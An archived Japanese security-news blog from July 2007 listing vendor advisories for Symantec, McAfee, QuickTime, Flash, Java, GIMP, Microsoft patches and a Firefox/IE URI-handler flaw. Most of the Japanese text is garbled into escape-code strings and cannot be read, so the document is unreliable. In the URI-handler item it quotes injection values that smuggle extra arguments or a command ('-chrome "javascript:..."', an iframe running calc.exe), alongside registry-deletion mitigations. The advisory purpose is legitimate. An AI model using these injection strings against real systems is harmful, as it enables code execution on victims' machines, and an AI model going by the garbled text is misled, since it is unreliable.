    $B!!4XO"(B: IE$B4XM?$N@H (ITmedia, 2007.07.13)$B!#(B CVE-2007-3670

    $B"#(B SYM07-019: Symantec AntiVirus Malformed RAR and CAB Compression Type Bypass
    (Symantec, 2007.07.11)

    $B!!$3$l$@$1$J$<$+$^$@F|K\8lHG$,=P$F$$$^$;$s$N$G!"0J2<$N5-=R$K$*$$$F!"F|K\$GH/Gd$5$l$F$$$k@=IJ!&%P!<%8%g%s$H$O0[$J$k2DG=@-$,$"$j$^$9!#(B

    $B!!%7%^%s%F%C%/$N!"%2!<%H%&%'%$7O$N@=IJ$d(B Norton AntiVirus / Norton Internet Security / Norton System Works 2004 / 2005 / 2006, Norton Personal Firewall 2006, Norton AntiVirus for Macintosh 9.x / 10.x, Norton Internet Security / Norton SystemWorks for Macintosh 3.x, Symantec AntiVirus Corporate Edition (SAV CE) 9.x / 10.0.x / 10.1.x $B$J$I$K7g4Y!#(B $B96N,(B RAR $B%U%!%$%k$K$h$k(B DoS$B!"96N,(B CAB $B%U%!%$%k$K$h$C$FG$0U$N%3!<%I$NpJs$"$j$,$H$&$4$6$$$^$9!#(B CVE-2007-3699 CVE-2007-0447

    $B!!=$@5HG$K$D$$$F$O(B SYM07-019 $B$N5-=R$r;2>H!#(B

    $B"#(B SYM07-018: Symantec SYMTDI.SYS $B%G%P%$%9%I%i%$%P$K!"%m!<%+%k$GFC8">:3J$N@H
    ($B%7%^%s%F%C%/(B, 2007.07.11)

    $B!!(BNorton AntiVirus / Norton Internet Security / Norton Personal Firewall / Norton System Works 2005 / 2006, Norton AntiSpam 2005, Symantec AntiVirus Corporate Edition (SAV CE) 9.x / 10.0.x / 10.1.x$B!"(BSymantec Client Security (SCS) 2.0.x / 3.0.x / 3.1.x $B$K7g4Y!#(BSYMTDI.SYS $B$K7g4Y$,$"$j!"(Blocal user $B$,(B SYSTEM $B8"8B$GG$0U$N%3!<%I$rCVE-2007-3673

    $B!!(BNorton AntiVirus / Norton Internet Security / Norton Personal Firewall / Norton System Works 2005 / 2006, Norton AntiSpam 2005 $B$K$D$$$F$O(B LiveUpdate $B$r

    $B!!4XO"(B: Symantec AntiVirus symtdi.sys Local Privilege Escalation Vulnerability (iDefense)

    $B"#(B SYM07-017: Symantec AntiVirus Corporate Edition $B$K%m!<%+%k$GFC8">:3J$N@H
    ($B%7%^%s%F%C%/(B, 2007.07.11)

    $B!!(BSymantec AntiVirus Corporate Edition (SAV CE) 9.x / 10.0.x / 10.1.x$B!"(BSymantec Client Security (SCS) 2.0.x / 3.0.x / 3.1.x $B$K7g4Y!#(B Real-Time $B%9%-%c%J(B (RTVScan) $B$K7g4Y$,$"$j!"(Blocal user $B$,(B SYSTEM $B8"8B$rCVE-2006-3455

    $B!!(BSAV CE 9.0.6 MR6 MP1 ($B%S%k%I(B 1100) $B0J9_(B / 10.1.4 MR4 MP1 ($B%S%k%I(B 4010) $B0J9_!"(B CS 2.0.6 MR6 MP1 ($B%S%k%I(B 1100) $B0J9_(B / SCS 3.1.4 MR4 MP1 ($B%S%k%I(B 4010) $B0J9_$K%"%C%W%0%l!<%I$7$FBP1~$9$k!#(B

    $B"#(B SYM07-016: Symantec Client Security $B$N(B Internet E-mail Auto-Protect $B5!G=$K%9%?%C%/%*!<%P!<%U%m!<$N@H
    ($B%7%^%s%F%C%/(B, 2007.07.11)

    $B!!(BSymantec AntiVirus Corporate Edition (SAV CE) 9.x / 10.0$B!"(BSymantec Client Security (SCS) 2.0.x / 3.0.x $B$K7g4Y!#(B Internet E-mail Auto-Protect $B5!G=$K7g4Y$,$"$j!"%a!<%k$N(B From:, To:, Subject: $B$,(B 951 $B%P%$%H0J>e$@$H(B buffer overflow $B$7(B DoS $B$,H/@8!#(B CVE-2006-3456

    $B!!(BSAV CE 9 MR6 (SAV CE 9.0.6.1000) $B0J9_(B / 10.1 $B0J9_!"(BSCS 2.0.6 MR6 ($B%S%k%I(B 1000-31) $B0J9_(B / SCS 3.1 $B0J9_$K%"%C%W%0%l!<%I$7$FBP1~$9$k!#(B

    $B"#(B SYM07-015: Symantec Backup Exec for Windows Server $B!'(B RPC $B%$%s%?%U%'!<%9$K%R!<%W%*!<%P!<%U%m!<$K$h$k%5!<%S%95qH]$N@H
    ($B%7%^%s%F%C%/(B, 2007.07.11)

    $B!!(BBackup Exec for Windows Servers 10.0 / 10d / 11d $B$K7g4Y!#(B RPC $B%$%s%?%U%'!<%9$K7g4Y$,$"$j!"(Bremote $B$+$i(B DoS $B967b$rCVE-2007-3509

    $B!!(BHotFix $B$,$"$k$N$GE,MQ$9$l$P$h$$!#(B

    $B!!4XO"(B: Symantec Backup Exec RPC Remote Heap Overflow Vulnerability (iDefense)$B!#(B6106/tcp $B$@$=$&$G$9!#(B

    $B"#(B 2007.07.12

    $B"#(B McAfee$B$N%(%s%?!<%W%i%$%:8~$1%=%U%H$K@H
    (ITmedia, 2007.07.12)

    $B!!(BMcAfee Common Management Agent (CMA) $B$K(B 4 $B$D$N7g4Y!#(B

    2007.07.13 $BDI5-(B:

    $B!!F|K\8lHG(B:

    2007.07.18 $BDI5-(B:

    $B!!(BFree ePO Vulnerability Scanner (eEye Research, 2007.07.17)

    $B"#(B [Clamav-announce] announcing ClamAV 0.91
    (clamav, 2007.07.11)

    $B!!(BClamAV 0.91 $BEP>l!#(B[Full-disclosure] Advisory - Clam AntiVirus RAR File Handling Denial Of Service Vulnerability $B$,=$@5$5$l$F$$$k!#(B CVE-2007-3725

    $B"#(B About the security content of QuickTime 7.2
    (Apple, 2007.07.11)

    $B!!(BQuickTime 7.2 $BEP>l!#(B8 $B$D$N7g4Y$,=$@5$5$l$F$$$^$9!#(B $B96N,(B QuickTime movie, H.264 movie, .m4v $B%U%!%$%k(B, SMIL $B%U%!%$%k$K$h$C$FG$0U$N%3!<%I$r!"(BQuickTime for Java $B$K4X$7$F(B 3 $B$D$N7g4Y$,$"$j!"(B $B96N,(B Java $B%"%W%l%C%H$r;H$C$FG$0U$N%3!<%I$rCVE-2007-2295 CVE-2007-2392 CVE-2007-2296 CVE-2007-2394 CVE-2007-2397 CVE-2007-2393 CVE-2007-2396 CVE-2007-2402

    $B!!%@%&%s%m!<%I(B:

    $B!!!D!D(BWindows 2000 $B$K%$%s%9%H!<%k$G$-$J$/$J$C$F$^$9$M!D!D(B orz

    $B!!4XO"(B: Apple QuickTime SMIL File Processing Integer Overflow Vulnerability (iDefense)

    2007.09.04 $BDI5-(B:

    $B!!(B [Full-disclosure] Apple QuickTime integer overflow vulnerability when parsing SMIL file$B!#(B CVE-2007-2394 $B$N7o!#(B

    $B"#(B IE$B$H(BFirefox$B$r%$%s%9%H!<%k$7$F$$$k?M$OMWCm0U(B--$B!VHs>o$K=EBg!W$J%;%-%e%j%F%#%j%9%/(B
    (CNET, 2007.07.11)

    $B!!(BFirefox 2.x $B$r(B Windows $B$K%$%s%9%H!<%k$7$F$$$k>l9g$K!"(BIE $B>e$K7g4Y$,H/@8$9$k!#(B Firefox 2.x $B$r%$%s%9%H!<%k$9$k$H!" 

    [HKEY_CLASSES_ROOT\FirefoxURL\shell\open\command\@]
C:\\PROGRA~1\\MOZILL~2\\FIREFOX.EXE -url "%1" -requestPending

    $B!!$3$N$?$a!"$?$H$($P(B %1 $B$K(B FirefoxURL://foo" -chrome "javascript:hogehoge... $B$,F~$k$h$&$J%"%s%+!<%?%0$r@_CV$7$F$*$/$H!"(BIE $B$G$=$N%j%s%/$rF'$s$@>l9g$K(B firefox.exe -url "FirefoxURL://foo" -chrome "javascript:hogehoge..." -requestPending $B$,5/F0$5$l$F$7$^$&!#(BFirefox $B<+?H$,(B FirefoxURL:// $B$r07$&>l9g$K$O$3$&$J$i$J$$$h$&$KFbIt=hM}$5$l$F$$$k$h$&$J$N$@$,!"(BIE $B$N>l9g$K$O%-%1%s$J>u67$K$J$k$h$&$@!#(B $B>\:Y$K$D$$$F$O(B Internet Explorer 0day Exploit (Larholm.com, 2007.07.10) $B$r;2>H!#4m81$J%"%s%+!<%?%0$N$K(B FirefoxHTML:// $B$d(B Firefox.URL:// $B$b4m81$JLOMM!#(B

    $B!!$3$N>u67$r2sHr$9$k$K$O!">e5-$N(B URI $B%O%s%I%i(B ($B%l%8%9%H%j@_Dj(B) $B$r:o=|$9$l$P$h$$!#(B Blocking the Firefox -> IE 0-day (Jesper's Blog, 2007.07.10) $B$G$O 

    reg delete HKCR\FirefoxHTML /f
reg delete HKCR\FirefoxURL /f
reg delete HKCR\Firefox.URL /f

    $B!!(BWindows 2000 $BMQ$N(B reg $B%3%^%s%I$O(B Windows 2000 Support Tools $B$K4^$^$l$F$$$k!#(B

    2007.07.13 $BDI5-(B:

    $B!!4XO"(B: IE$B4XM?$N@H (ITmedia, 2007.07.13)$B!#(B CVE-2007-3670

    2007.07.18 $BDI5-(B:

    $B!!(BFirefox 2.0.0.5 $B$,EP>l(B$B$7$^$7$?!#(B $B%O%s%I%i$G$9$,!" 

    [HKEY_CLASSES_ROOT\FirefoxURL\shell\open\command\@]
C:\\PROGRA~1\\MOZILL~2\\FIREFOX.EXE -requestPending -osint -url "%1"

    $B!!$"$H!"(BIE + Firefox2 $B$N@H ($B?eL57n$P$1$i$N$($SF|5-(B, 2007.07.16) $B$K(B FirefoxHTML $B$K$O:a$O$J$$$H$$$&OC$,=P$F$$$^$7$?!#(B

    2007.07.20 $BDI5-(B:

    $B!!$3$N7g4Y$G$9$,!"(BFirefox $B$@$1$G$J$/(B Thunderbird $B$K$b1F6A$9$k$=$&$G$9!#(B

    $B!!(BThunderbird 2.0.0.5 $B$G=$@5$5$l$k$=$&$G$9$,!"(BThunderbird 2.0.0.5 $B$O$^$@8x3+$5$l$F$$$^$;$s!#!D!D$H$+8@$C$F$k4V$K=P$F$^$7$?!#(B

    $B!!(BiDefense $B$+$i$b=P$F$^$7$?(B: [Full-disclosure] iDefense Security Advisory 07.19.07: Multiple Vendor Multiple Product URI Handler Input Validation Vulnerability$B!#(B Microsoft $BE*$K$O!"(BRegistering an Application to a URL Protocol (MSDN) $B$G$b9-Js$7$F$$$?;EMM$@$C$?$h$&$G!#(BMSDN $B$KNc<($5$l$F$$$?(B note: URI $B%O%s%I%i$,l9g!"(B

    <iframe src='note:"|calc.exe '>

    $B$H$$$&%?%0$G(B calc.exe $B$,<+F0$G5/F0$5$l$?$h$&$G$9!#(BMSDN $B%Z!<%8!"8=:_$O2~D{$5$l$F$$$^$9!#(B

    $B!!(BiDefense $B$K$h$k$H!">/$J$/$H$b 

    HKEY_CLASSES_ROOT\FirefoxURL\shell
HKEY_CLASSES_ROOT\Thunderbird.Url.mailto\shell
HKEY_CLASSES_ROOT\Thunderbird.Url.news\shell
HKEY_CLASSES_ROOT\mailto\shell
HKEY_CLASSES_ROOT\news\shell

    $B"#(B Photoshop CS2 and CS3 updates to address security vulnerabilities
    (Adobe, 2007.07.11)

    $B!!(BAdobe Photoshop CS2 / CS3 $B$K7g4Y!#96N,(B BMP, DIB, RLE, PNG $B%U%!%$%k$r;H$C$FG$0U$N%3!<%I$rCVE-2007-2244 CVE-2007-2365

    $B!!(BCS2 / CS3 $B$N(B Windows / Mac $BMQ$N(B$B=$@5%W%m%0%i%`(B$B$,G[I[$5$l$F$$$k$N$GE,MQ$9$l$P$h$$!#(B

    $B"#(B Flash Player update available to address security vulnerabilities
    (Adobe, 2007.07.11)

    $B!!(BFlash Player 9.0.45.0 $B0JA0(B / 8.0.34.0 $B0JA0(B / 7.0.69.0 $B0JA0$K7g4Y!#(B

    • CVE-2007-3456$B!#(B $B96N,(B SWF $B%U%!%$%k$K$h$C$F(B remote $B$+$iG$0U$N%3!<%I$r

    • CVE-2007-3457$B!#(B HTTP Referer $B%X%C%@$N=hM}$K7g4Y$,$"$j!"(BCSRF $B@HJVN#72595280: Flash Player $B$K$*$$$FG$0U$N(B Referer $B%X%C%@$,Aw?.2DG=$J@H $B$b;2>H!#(B

    • CVE-2007-2022$B!#(BFlash Player 7 $B$H(B Opera / Konqueror $B$H$NAH$_$"$o$;$G7g4Y$,H/@8$9$k!#(B Changelog for Opera 9.20 for Windows $B$G=$@5$5$l$?7o!#(B $B$3$N7g4Y$O(B Flash Player 9 $B$K$O1F6A$7$J$$!#(B

    $B!!(BFlash Player 9.0.47.0 / 8.0.35.0 / 7.0.70.0 $B$G=$@5$5$l$F$$$k!#(B Wii $B$d(B Play Station 3 $B$N(B Web $B%V%i%&%6$K$D$$$F$$$k$N$O(B 7.0.70.0 $B$NLOMM!#(B

    $B!!4XO"(B: Flash Player $B$N$?$a$K?.Mj$7$J$1$l$P$J$i$J$$%I%a%$%s(B ($B?eL57n$P$1$i$N$($SF|5-(B)

    2007.07.17 $BDI5-(B:

    $B!!4XO"(B:

    2007.07.24 $BDI5-(B:

    $B!!(BFlash$B$N@HuBV$K(B (ITmedia, 2007.07.23)$B!"(BWii gets Flashed by a bug too! (symantec blog, 2007.07.20)$B!#$"$l$'(B? $B%P!<%8%g%sHV9f$+$i$9$k$H!"7g4Y$N1F6A$r

    2007.07.25 $BDI5-(B:

    $B!!(B$BK:$l$i$l$?(BWii$BBP1~!)!!(BFlash$B%Q%C%A$N%P!<%8%g%sHV9f$K:.Mp(B (ITmedia, 2007.07.24) $B$h$j(B:

    Kaspersky$B$K$h$k$H!"(BWii$B$N(BFlash Player 7.0.70.0$B$O!"$[$+$N%W%i%C%H%U%)!<%`MQ$N(B7.0.70.0$B$h$j$bA0$NF|IU$K$J$C$F$*$j!"F1$8$b$N$G$J$$$3$H$OL@$i$+$@$H$$$&!#(BAdobe$B$N%5%$%H$K(BWii$B$K$D$$$F$N5-:\$O$J$/!"(BWii$B$N$3$H$OK:$l$i$l$F$$$k$h$&$@$H$$$&!#(B

    $B!!%P!<%8%g%sHV9f$,F1$8$G$bF|IU$,0c$&$N$O$h$/$"$k$3$H$J$N$GJL$K$$$$$N$G$9$,!"Cf?H$^$G0c$C$F$$$k$H:$$k$N$G$9$h$M!D!D!#(B

    $B"#(B $BDI5-(B

    2007 $BG/(B 7 $B7n$N%;%-%e%j%F%#>pJs(B

    $B!!=P$^$7$?!#(B

    $B!!(BMicrosoft Update$B<:GT$7$?$i(Bage$B$k%9%l(B 15 $B$G$O!"(B.NET Framework 1.x / 2.x $B$N(B patch $B$N%$%s%9%H!<%k$K<:GT$9$k;vNc$,J#?tJs9p$5$l$F$$$k!#(B $B$3$N>l9g$K$O!"(B$B$B$H$h$$$i$7$$!#(B

    1. Windows Installer CleanUp $B%f!<%F%#%j%F%#(B$B$r%$%s%9%H!<%k$9$k(B
    2. Windows Installer CleanUp $B%f!<%F%#%j%F%#$r;H$C$F(B .NET Framework $B$N9=@.>pJs$rA4$F:o=|(B
    3. .NET Framework $BK\BN!"(BService Pack ($B$b$7$"$l$P(B)$B!"%;%-%e%j%F%#(B patch $B$r:F%$%s%9%H!<%k(B

    $B!!$"$H!"(B.NET Framework 3.0 $B$O(B 2.0 $B$N%9!<%Q!<%;%C%H$J$N$G!"(B.NET Framework 3.0 $B$@$1$,F~$C$F$$$k4D6-$G$b(B 2.0 $BAjEvItJ,$KBP$7$F(B patch $B$NE,MQ$,I,MW(B (Microsoft Update $B$H$+$9$k$H(B patch $B$NE,MQ$r5a$a$i$l$k(B) $B$h$&$G$9!#(B

    $B!!4XO"(B:

    $B"#(B 2007.07.11

    $B"#(B 2007.07.10

    $B"#(B [Full-disclosure] Anti-DNS Pinning and Java Applets
    (Full-disclosure, 2007.07.10)

    $B!!(BAnti-DNS Pinning $B4XO"OC!#(BFirefox 2 / IE 7 + JRE 5 / 6 $B$GF0$/$=$&$G$9!#(B

    $B!!(BAnti-DNS Pinning $B$N0lHLCN<1$K$D$$$FF|K\8l$GFI$_$d$9$$$N$O$3$N$"$?$j$G$7$g$&$+!#(B

    $B!!(B$B%&%'%V%"%W%j%1!<%7%g%s%;%-%e%j%F%#(B$B$,H/Gd$5$l$l$P!"$=$l$,$$$A$P$sFI$_$d$9$/$J$k$N$+$J!#$&$%$`%O!<%I%+%P!<$G$9$+!D!D!#(B

    $B"#(B [Full-disclosure] EEYE: Sun Java WebStart JNLP Stack Buffer Overflow Vulnerability
    (eEye, 2007.07.10)

    $B!!(BSun JDK / JRE 5 Update 11 $B0JA0(B, JDK / JRE 6 Update 1 $B0JA0$K7g4Y!#(B Java WebStart $B$K7g4Y$,$"$j!"96N,(B JNLP $B%U%!%$%k$r3+$/$HG$0U$N%3!<%I$rCVE-2007-3655

    $B!!(BSun JDK / JRE 5 Update 12, JDK / JRE 6 Update 2 $B$G=$@5$5$l$F$$$k!#(B

    $B!!$J$*!"(BSun JDK / JRE 5 Update 11 $B0JA0(B, SDK / JRE 1.4.2_13 $B0JA0$K$OB>$K$b(B (?) Java WebStart $BJ}LL$N7g4Y$,$"$j!"(BJDK / JRE 5 Update 12, SDK / JRE 1.4.2_14 $B$G=$@5$5$l$F$$$kLOMM!#(B

    $B"#(B WinPcap NPF.SYS Local Privilege Escalation Vulnerability
    (iDefense, 2007.07.09)

    $B!!(BWinPcap 4.0 (Wireshark 0.99.5 $B$KF1:-(B) $B$K7g4Y!#(BNPF.SYS $B$K7g4Y$,$"$j!"(B local user $B$,(B kernel $B8"8B$GG$0U$N%3!<%I$rCVE-2007-3681

    $B!!(BWinPcap 4.0.1 $B$G=$@5$5$l$F$$$k!#(B

    $B"#(B Multiple Vendor GIMP Multiple Integer Overflow Vulnerabilities
    (iDefense, 2007.07.09)

    $B!!(BGIMP 2.2.15 $B0JA0$KJ#?t$N7g4Y!#2hA|FI$_9~$_%W%i%0%$%s$KJ#?t$N7g4Y$,$"$j!"(B $B96N,(B DICOM, PNM, PSD, PSP, Sun RAS, XBM, XWD $B2hA|$r;H$C$FG$0U$N%3!<%I$rCVE-2006-4519

    $B!!(BGIMP 2.2.16 $B$G=$@5$5$l$F$$$k!#(B

    $B"#(B $BDI5-(B

    Beware of LZH

    $B!!(BCSIRT$B%a%b(B: JVN $B$K7G:\$5$l$?%/%m%9%5%$%H!&%9%/%j%W%F%#%s%0LdBj(B ($BF|7P(B IT Pro, 2007.07.10) $B$K:#2s$NOC$N;~7ONs$,=P$F$$$^$9!#(B

    $B"#(B 2007.07.09

    $B"#(B 2007.07.08

    $B"#(B $BDI5-(B

    Beware of LZH

    $B!!(B+Lhaca 1.21 $B$K$b$^$@7g4Y$,;D$C$F$$$?OC$N>\:Y(B:

    $B"#(B $B$$$m$$$m(B (2007.07.08)
    (various)

    $B"#(B 2007.07.07

    $B"#(B 2007.07.06

    $B"#(B $BDI5-(B

    102934: Security Vulnerabilities in the Java Runtime Environment Image Parsing Code may Allow a Untrusted Applet to Elevate Privileges

    $B!!(B2007.06.29 $BIU$G99?7$5$l$F$*$j!"(BSDK / JRE 1.4.2_15 $B$bF~

    $B"#(B 2007 $BG/(B 7 $B7n$N%;%-%e%j%F%#>pJs(B
    (Microsoft, 2007.07.06)

    $B!!$b$&$=$s$J;~4|$J$s$G$9$M!#(B

    • $B6[5^(B: 3
      • $B%;%-%e%j%F%#>pJs(B 1: Excel 2000 / 2003 / 2007, Excel Viewer 2007, Microsoft Office $B8_495!G=%Q%C%/(B
        Excel 2002 (XP) $B$@$1$,4^$^$l$F$$$J$$$3$H$KCm0U!#(B
      • $B%;%-%e%j%F%#>pJs(B 4: Windows 2000 Server / Server 2003$B!#%5!<%PMQ%3%s%]!<%M%s%H$@$1$NLOMM!#(B
      • $B%;%-%e%j%F%#>pJs(B 5: .NET Framework 1.x / 2.x
    • $B=EMW(B: 2
      • $B%;%-%e%j%F%#>pJs(B 2: Publisher 2007
      • $B%;%-%e%j%F%#>pJs(B 6: Windows XP
    • $B7Y9p(B: 1
      • $B%;%-%e%j%F%#>pJs(B 3: Windows Vista
    • $B%;%-%e%j%F%#0J30$NM%@hEY$N9b$$99?7%W%m%0%i%`(B
      • MU / WSUS: 4 $B7o(B
      • WU / SUS: 1 $B7o(B

    $B!!?7$7$$;vA0DLCN$G$9$,!"(BMicrosoft $B$H$7$F$O(B$B%U%#!<%I%P%C%/$r5a$a$F$$$k(B$B$=$&$G$9!#(B

    2007.07.12 $BDI5-(B:

    $B!!=P$^$7$?!#(B

    $B!!(BMicrosoft Update$B<:GT$7$?$i(Bage$B$k%9%l(B 15 $B$G$O!"(B.NET Framework 1.x / 2.x $B$N(B patch $B$N%$%s%9%H!<%k$K<:GT$9$k;vNc$,J#?tJs9p$5$l$F$$$k!#(B $B$3$N>l9g$K$O!"(B$B$B$H$h$$$i$7$$!#(B

    1. Windows Installer CleanUp $B%f!<%F%#%j%F%#(B$B$r%$%s%9%H!<%k$9$k(B
    2. Windows Installer CleanUp $B%f!<%F%#%j%F%#$r;H$C$F(B .NET Framework $B$N9=@.>pJs$rA4$F:o=|(B
    3. .NET Framework $BK\BN!"(BService Pack ($B$b$7$"$l$P(B)$B!"%;%-%e%j%F%#(B patch $B$r:F%$%s%9%H!<%k(B

    $B!!$"$H!"(B.NET Framework 3.0 $B$O(B 2.0 $B$N%9!<%Q!<%;%C%H$J$N$G!"(B.NET Framework 3.0 $B$@$1$,F~$C$F$$$k4D6-$G$b(B 2.0 $BAjEvItJ,$KBP$7$F(B patch $B$NE,MQ$,I,MW(B (Microsoft Update $B$H$+$9$k$H(B patch $B$NE,MQ$r5a$a$i$l$k(B) $B$h$&$G$9!#(B

    $B!!4XO"(B:

    2007.07.13 $BDI5-(B:

    $B!!$$$m$$$m99?7$5$l$F$$$k!#(B

    $B!!4XO"(B:

    2007.07.15 $BDI5-(B:

    $B!!>e5-$7$?(B 7$B7n$N%;%-%e%j%F%#(B $B%j%j!<%9(B $B8e$N$^$H$a(B ($BF|K\$N%;%-%e%j%F%#%A!<%`$N(B Blog, 2007.07.13) $B$K$*$$$F(B 940297 - Windows XP SP2 $B$K(B .Net Framework $B$r:F%$%s%9%H!<%k$9$kJ}K!(B $B$,>R2p$5$l$F$$$?$N$GDI5-!#(B

    2007.08.03 $BDI5-(B:

    $B!!99?7>pJs(B

    2007.12.02 $BDI5-(B:

    $B!!(BWindows Server 2003 $B$K(B MS07-039 patch $B$^$?$O(B SP2 $B$rE,MQ$7$?>l9g$KH/@8$9$kIT6q9g$NOC(B:

    $B!!%7%s%0%k%I%a%$%s$N>l9g$K$O4X78$"$j$^$;$s!#(B

    $B"#(B 2007.07.05

    $B"#(B 2007.07.04

    $B"#(B 2007.07.03

    $B"#(B $B4k6H44It$rA@$C$?967b$,3HBg(B--$B%;%-%e%j%F%#4k6H$,L@$i$+$K(B
    (CNET, 2007.07.03)

    $B!!4k6HFb$N5!L)>pJs$rA@$C$?I8E*7?967b$,?<$/@E$+$K?;F)Cf$N$h$&$G$9!#(B

    $B"#(B $BDI5-(B

    About the security content of the Mac OS X 10.4.10 Update

    $B!!(BAPPLE-SA-2007-07-02 Version 1.1 of Mac OS X 10.4.10 Update (Apple, 2007.07.03)$B!#(B Mac OS X 10.4.10 Update 1.1 $B$,=P$?$=$&$G$9!#(B Intel Mac $B$G%*!<%G%#%*4X78$NIT6q9g$,$"$C$?LOMM!#(BPowerPC $B$OL5LdBj$G$9!#(B

    $B"#(B 2007.07.02

    $B"#(B $BDI5-(B

    Beware of LZH

    $B!!(B+Lhaca 1.21 $B$K$b$^$@7g4Y$,;D$C$F$$$?$h$&$G!"$3$l$r=$@5$7$?(B +Lhaca 1.23 $B$,EP>l$7$F$$$^$9!#(B

    $B"#(B 2007.07.01

    [$B%;%-%e%j%F%#%[!<%k(B memo]
    $B;d$K$D$$$F(B